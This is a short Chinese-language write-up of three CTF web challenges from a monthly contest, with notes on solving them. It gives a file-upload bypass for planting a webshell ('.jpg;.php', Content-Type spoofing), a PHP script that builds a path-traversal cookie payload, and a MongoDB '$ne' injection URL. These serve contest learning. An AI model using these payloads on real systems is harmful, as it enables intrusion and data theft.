安恒六月月赛web题

WEB

做题的时候只会一道web难受

现在周周练复现一下吧

ezupload

进去是一道上传题

然后搞个图片马

解析漏洞 后缀改成.jpg;.php就可以菜刀连上去

后来看大佬的博客

说是过滤前三个字母后缀名

随便搞个jpg如这样的都可以上传上去

Mynote

进去注册有个上传界面,改下Content-Type: image/jpeg 可以上传一句话,但是菜刀连上去会500

http://101.71.29.5:10000/upload/b48e7a26aa940ba34d0c4fce606a1221/123.php

目录那个为用户名的md5值 虽然这个不能解题 记一下 以后说不定有可能遇到

解法:先看robots.txt页面

1
2
3
4
5
User-agent: *
Allow: /controllers/Basecontrol.php
Allow: /controllers/Controllers.php
Allow: /controllers/User.php
Allow: /flag.php

Picture里面抓下包发现有一段

url编码再解base64发现是一段json格式的东西

然后这就与反序列化有关了

这是一个数组类型的反序列化但直接反序列化会有报错

1
2
3
4
5
6
7
8
<?php

$a[] = '../../controllers/Basecontrol.php';
$b[] = '../../flag.php';
$c[] = '../../controllers/User.php';
$d[] = '../../controllers/Controllers.php.php';

echo urlencode(base64_encode(serialize($a)));

改cookie发过去

解base64得到flag

1
2
3
4
<?php

$flag = "flag{N4me_sPac4_Is_Int3r3st1ng}";
echo "flag{This_1S_A_F4ke_f1aG}";

never give up

这个题目是mongdb注入

一脸懵逼

payload

1
http://101.71.29.5:10000/?title[$ne]=1

好菜啊啊啊啊啊啊啊啊!!!!

lego 干巴爹!